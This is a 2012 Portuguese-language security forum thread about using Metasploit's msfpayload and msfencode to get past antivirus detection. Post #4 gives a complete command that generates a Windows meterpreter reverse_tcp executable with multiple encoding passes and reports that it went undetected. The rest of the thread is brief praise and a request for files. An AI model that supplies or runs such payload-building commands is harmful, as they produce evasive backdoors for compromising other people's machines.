Galera, achei interessante esse vídeo que mostra o uso do msfpayload + msfencode + algumas outras ferramentas para evitar a detecção de antivírus, logicamente o interessante do vídeo é entender o que esta sendo feito, bem como o que cada mudança de parâmetro faz no msfencode.
Abraços.
Resultados 1 a 7 de 7
Tópico: Bypassing Anti-Vírus(Metasploit)
-
02 Feb 2012, 17:16 #1Membro
- Data de Ingresso
- Aug 2009
- Posts
- 285
Bypassing Anti-Vírus(Metasploit)
-
02 Feb 2012, 17:26 #2Newbie
- Data de Ingresso
- Jan 2012
- Posts
- 26
Interessante ....
bela contribuição
-
02 Feb 2012, 17:50 #3Gray Hat
- Data de Ingresso
- Jan 2011
- Localização
- #!/bin/bash
- Posts
- 1.736
Show de bola esse vídeo =)
Bem interessante, um link de complemento (inglês) mas bem legal.
t+Når du føler flove over at se på tras eller bange for at se fremad, se venstre eller højre I be altid ved din side.
Haters Gonna Hate
-
02 Feb 2012, 20:39 #4Lamer
- Data de Ingresso
- Jan 2012
- Posts
- 11
Mto legal a técnica que ele usa.
Fiz os testes aqui e não foi detectado nada.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.174 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -c 3 R | msfencode -e x86/jmp_call_additive -t raw -a x86 -c 3 R | msfencode -e shikata_ga_nai -t exe -a x86 -c 3 X > 777.exeVocês riem de mim por eu ser diferente, e eu rio de vocês por serem todos iguais [ 0fx66 ]
-
02 Feb 2012, 21:16 #5Newbie
- Data de Ingresso
- Jan 2012
- Posts
- 58
-
02 Feb 2012, 21:55 #6Lamer
- Data de Ingresso
- Jan 2012
- Posts
- 11
Queria aqueles arquivos que ele usa em C e tals. Alguém tem?
Vocês riem de mim por eu ser diferente, e eu rio de vocês por serem todos iguais [ 0fx66 ]
-
02 Feb 2012, 21:56 #7Membro
- Data de Ingresso
- Aug 2009
- Posts
- 285
Bom material smiley.
Responder com Citação
